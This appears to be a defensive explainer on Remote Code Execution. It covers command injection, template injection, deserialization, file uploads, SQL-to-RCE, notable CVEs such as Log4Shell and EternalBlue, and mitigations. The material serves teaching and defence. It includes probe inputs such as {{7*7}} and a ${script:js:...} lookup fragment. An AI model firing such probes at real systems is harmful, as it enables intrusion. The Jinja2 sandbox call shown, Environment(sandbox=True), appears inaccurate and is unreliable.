RCE - Remote Code Execution

Remote Code Execution is the attacker’s “Holy Grail”—and an administrator’s worst nightmare. A successful RCE gives an attacker complete control over a system without ever having to be physically present. Log4Shell (CVE-2021-44228) demonstrated in 2021 how a single RCE in a widely used library compromised hundreds of thousands of systems worldwide within hours.

Sources of RCE

1. Command Injection

CVSS 9.8 (often unauthenticated): User input is passed to the OS shell.

Insecure implementations:

• Python subprocess with shell=True + unvalidated input
• PHP shell_exec()/passthru() with user input
• Node.js child_process functions with interpolated parameters (exec variant)
• Java Runtime.getRuntime().exec() with string concatenation

Secure alternative:

• Parameterized commands without shell interpretation
• Input allowlist: allow only alphanumeric characters
• Parameter lists instead of shell strings (no metacharacter problem)

2. Server-Side Template Injection (SSTI)

Template engine processes user input as template code.

• Detection test: If {{7*7}} returns "49" in the response → Template injection confirmed! (Jinja2, Twig, etc.)
• Engine-specific escaping function is missing
• In the worst case: Access to interpreter classes → RCE

Protection:

• Never render user input as template source code
• Only pass variables into templates (no template code from user input)
• Use a sandboxed template engine (Environment(sandbox=True))

3. Deserialization

Objects are loaded from binary/text formats without validation:

• Java: readObject() without ObjectInputFilter
• PHP: unserialize() without a class allowlist
• Python: pickle.loads() on untrusted data
• Attacker injects a crafted serialized object → gadget chain
• Result: arbitrary methods are called during deserialization!

Protection:

• Use JSON/Protocol Buffers instead of native serialization
• ObjectInputFilter (Java): whitelist allowed classes
• Never apply pickle/unserialize to external data!

4. File Upload + Path Traversal

• Attacker uploads executable file (webshell)
• Server executes uploaded file (missing file type validation)
• Common: PHP webshells in files disguised as images

Protection:

• File type validation (magic bytes, not just extension)
• Store uploads outside the web root (never serve them directly!)
• Content-Disposition: attachment (no inline rendering)
• Allowlist: only allow image/jpeg, image/png, application/pdf

5. SQL Injection → RCE

• LOAD_FILE / INTO OUTFILE in MySQL: writing files
• xp_cmdshell in MSSQL: direct command execution
• Prerequisite: high database privileges (FILE privilege, sysadmin)

Protection:

• Prepared statements against SQL injection
• Minimal DB privileges: no FILE privilege for app users
• MSSQL: Keep xp_cmdshell disabled

Known RCE CVEs (Reference)

Log4Shell (CVE-2021-44228)

• Software: Apache Log4j 2.0-2.14.1
• CVSS: 10.0 (Critical)
• Method: JNDI lookup in log messages
• Payload principle: Prepared log entry loads remote class via LDAP
• Impact: Virtually all Java applications affected
• Fix: Upgrade to Log4j 2.15.0+ / Set JVM flag

EternalBlue (CVE-2017-0144)

• Software: Windows SMBv1
• CVSS: 9.8 (Critical)
• Method: Buffer overflow in SMB implementation
• Exploited by: WannaCry, NotPetya ransomware (2017)
• Fix: Apply MS17-010 patch + disable SMBv1!

Spring4Shell (CVE-2022-22965)

• Software: Spring Framework < 5.3.18
• CVSS: 9.8 (Critical)
• Method: Data Binding + ClassLoader Manipulation
• Fix: Upgrade to Spring 5.3.18+ or 5.2.20+

ProxyLogon (CVE-2021-26855)

• Software: Microsoft Exchange Server
• CVSS: 9.8 (Critical)
• Method: SSRF → Server-Side Authentication Bypass → SYSTEM
• Exploited by: Hafnium (APT), ransomware groups

Confluence OGNL Injection (CVE-2022-26134)

• Software: Atlassian Confluence
• CVSS: 9.8 (Critical)
• Method: OGNL Template Expression in URL → Code Execution
• Fix: Upgrade to 7.4.17+ / 7.13.7+

Text4Shell (CVE-2022-42889)

• Software: Apache Commons Text < 1.10.0
• Method: Lookup interpolation: ${script:js:...} executes code
• Similar to Log4Shell but with a smaller scope

Mitigations against RCE

Development (Shift-Left)

• Parameterized commands instead of shell interpolation
• Deserialization: JSON/Protobuf instead of native formats
• Template engines: User input only as variables, never as source code
• SAST in CI/CD: CodeQL, Semgrep (detects command injection patterns)
• Dependency check: Snyk, Dependabot, OWASP Dependency Check

Infrastructure

• Patch management: Critical CVEs within 7 days (EPSS prioritization)
• WAF: OWASP CRS blocks many RCE payloads (SQLi, SSTI, command injection)
• Least privilege: Web servers without root privileges (non-root users!)
• Container security: read-only filesystem, no privileged mode
• Network segmentation: Web servers have no direct database access

Detection

• EDR: Anomalous process hierarchies (web server spawns shell)
• SIEM rule: Outbound network connections from server processes
• File integrity monitoring: New files in WebRoot → immediate alert
• Vulnerability scanner (Nessus, Qualys): Weekly scan

Response

• Incident Response Plan: RCE → immediate network isolation
• Forensics: Retain logs for 90 days (when was initial access?)
• Backup validation: Can data be restored after compromise?
• Communication: GDPR reporting obligation (Art. 33) in case of data breach via RCE

CVSS rating for RCE (example)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Score: 9.8 (Critical)

Metric	Value	Meaning
AV:N	Network	Accessible remotely
AC:L	Low	Easily reproducible
PR:N	None	No login required
UI:N	None	No user interaction required
C/I/A:H	High	Complete CIA compromise